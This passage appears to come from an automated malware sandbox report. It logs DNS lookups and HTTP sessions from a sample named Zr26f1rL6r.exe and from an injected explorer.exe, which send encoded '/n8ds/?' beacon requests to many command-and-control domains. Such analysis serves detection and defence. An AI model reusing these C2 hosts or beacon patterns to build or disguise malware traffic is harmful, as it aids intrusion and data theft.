                                                                                                                        Nov 25, 2021 12:59:26.513344049 CET9.9.9.9192.168.11.200xa37aNo error (0)www.jamiecongedo.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.513344049 CET9.9.9.9192.168.11.200xa37aNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.513344049 CET9.9.9.9192.168.11.200xa37aNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.513344049 CET9.9.9.9192.168.11.200xa37aNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:26.513344049 CET9.9.9.9192.168.11.200xa37aNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:31.680389881 CET1.1.1.1192.168.11.200x18efNo error (0)www.lopsrental.lease66.29.140.185A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 12:59:56.131233931 CET1.1.1.1192.168.11.200x4871Name error (3)www.wordpresshostingblog.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:01.233881950 CET1.1.1.1192.168.11.200x50ecName error (3)www.photon4energy.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:06.735636950 CET9.9.9.9192.168.11.200xa2dbNo error (0)www.hsbp.online116.62.216.226A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:06.831073046 CET1.1.1.1192.168.11.200xa2dbNo error (0)www.hsbp.online116.62.216.226A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:30.477859974 CET9.9.9.9192.168.11.200x4dabNo error (0)www.hsbp.online116.62.216.226A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:30.897559881 CET1.1.1.1192.168.11.200x4dabNo error (0)www.hsbp.online116.62.216.226A (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:00:53.921145916 CET1.1.1.1192.168.11.200x7c85Name error (3)www.wordpresshostingblog.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:04.101047993 CET1.1.1.1192.168.11.200x56ebServer failure (2)www.braxtynmi.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:05.443922043 CET9.9.9.9192.168.11.200x56ebServer failure (2)www.braxtynmi.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:05.901644945 CET9.9.9.9192.168.11.200x56ebServer failure (2)www.braxtynmi.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:10.623939991 CET1.1.1.1192.168.11.200x9efeName error (3)www.aubzo7o9fm.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:21.523458958 CET1.1.1.1192.168.11.200xc796Name error (3)www.koedayuuki.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:28.100953102 CET1.1.1.1192.168.11.200xf45eServer failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:28.101001024 CET1.1.1.1192.168.11.200xf45eServer failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:28.143435001 CET9.9.9.9192.168.11.200xf45eServer failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:29.227781057 CET9.9.9.9192.168.11.200xf45eServer failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:29.390598059 CET9.9.9.9192.168.11.200xf45eServer failure (2)www.abcjanitorialsolutions.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:33.178805113 CET1.1.1.1192.168.11.200x7e4dName error (3)www.diamota.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:48.535561085 CET1.1.1.1192.168.11.200x6e31Name error (3)www.diamota.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:53.565690994 CET1.1.1.1192.168.11.200x6a85No error (0)www.littlefishth.comlittlefishth.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Nov 25, 2021 13:01:53.565690994 CET1.1.1.1192.168.11.200x6a85No error (0)littlefishth.com34.102.136.180A (IP address)IN (0x0001)

                                                                                                                        HTTP Request Dependency Graph

                                                                                                                        • atseasonals.com
                                                                                                                        • www.topwowshopping.store
                                                                                                                        • www.growebox.com
                                                                                                                        • www.ayudavida.com
                                                                                                                        • www.stylesbykee.com
                                                                                                                        • www.inklusion.online
                                                                                                                        • www.mackthetruck.com
                                                                                                                        • www.helpcloud.xyz
                                                                                                                        • www.ozattaos.xyz
                                                                                                                        • www.unitedmetal-saudi.com
                                                                                                                        • www.divorcefearfreedom.com
                                                                                                                        • www.jamiecongedo.com
                                                                                                                        • www.lopsrental.lease

                                                                                                                        HTTP Packets

                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        0192.168.11.2049812107.6.148.162443C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        1192.168.11.2049837107.6.148.162443C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        10192.168.11.204982288.99.22.580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:57:38.250077963 CET6441OUTGET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1
                                                                                                                        Host: www.helpcloud.xyz
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:57:38.265187025 CET6442INHTTP/1.1 301 Moved Permanently
                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                        Date: Thu, 25 Nov 2021 11:57:38 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 178
                                                                                                                        Connection: close
                                                                                                                        Location: https://www.helpcloud.xyz:443/n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        11192.168.11.2049823172.67.164.15380C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:57:48.440284967 CET6443OUTGET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1
                                                                                                                        Host: www.ozattaos.xyz
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        12192.168.11.20498243.64.163.5080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:57:53.969954967 CET6444OUTGET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1
                                                                                                                        Host: www.inklusion.online
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:57:53.981384993 CET6444INHTTP/1.1 410 Gone
                                                                                                                        Server: openresty
                                                                                                                        Date: Thu, 25 Nov 2021 11:57:39 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        13192.168.11.2049825136.143.191.20480C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:58:04.395824909 CET6445OUTGET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1
                                                                                                                        Host: www.unitedmetal-saudi.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:58:04.573025942 CET6446INHTTP/1.1 404
                                                                                                                        Server: ZGS
                                                                                                                        Date: Thu, 25 Nov 2021 11:58:04 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 4657
                                                                                                                        Connection: close
                                                                                                                        Set-Cookie: 0cea9df7db=0f71d2b25c73f2883ce01c2fd3c97eb8; Path=/
                                                                                                                        X-XSS-Protection: 1
                                                                                                                        Set-Cookie: csrfc=7cab9245-d002-4707-a403-488c5a26dce3;path=/;priority=high
                                                                                                                        Set-Cookie: _zcsr_tmp=7cab9245-d002-4707-a403-488c5a26dce3;path=/;SameSite=Strict;priority=high
                                                                                                                        Pragma: no-cache
                                                                                                                        Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                        vary: accept-encoding
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35
                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
                                                                                                                        Nov 25, 2021 12:58:04.573091030 CET6448INData Raw: 32 70 78 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b
                                                                                                                        Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
                                                                                                                        Nov 25, 2021 12:58:04.573141098 CET6449INData Raw: 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20
                                                                                                                        Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
                                                                                                                        Nov 25, 2021 12:58:04.573188066 CET6450INData Raw: 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                                                                                        Data Ascii: ors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <div class="content"> <div class="textArea">


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        14192.168.11.20498263.64.163.5080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:58:24.837934971 CET6452OUTGET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.inklusion.online
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:58:24.849364996 CET6452INHTTP/1.1 410 Gone
                                                                                                                        Server: openresty
                                                                                                                        Date: Thu, 25 Nov 2021 11:58:24 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        15192.168.11.2049827203.170.80.25080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:58:40.925452948 CET6454OUTGET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.mackthetruck.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        16192.168.11.2049828192.0.78.2580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:59:21.091321945 CET6458OUTGET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1
                                                                                                                        Host: www.divorcefearfreedom.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:59:21.100280046 CET6458INHTTP/1.1 301 Moved Permanently
                                                                                                                        Server: nginx
                                                                                                                        Date: Thu, 25 Nov 2021 11:59:21 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Content-Length: 162
                                                                                                                        Connection: close
                                                                                                                        Location: https://www.divorcefearfreedom.com/n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9
                                                                                                                        X-ac: 2.hhn _dca
                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        17192.168.11.2049829198.185.159.14480C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 12:59:26.543008089 CET6460OUTGET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1
                                                                                                                        Host: www.jamiecongedo.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 12:59:26.648669958 CET6461INHTTP/1.1 400 Bad Request
                                                                                                                        Cache-Control: no-cache, must-revalidate
                                                                                                                        Content-Length: 77564
                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                        Date: Thu, 25 Nov 2021 11:59:26 UTC
                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                        Pragma: no-cache
                                                                                                                        Server: Squarespace
                                                                                                                        X-Contextid: 4zgLEe1M/5T4GrCAz
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
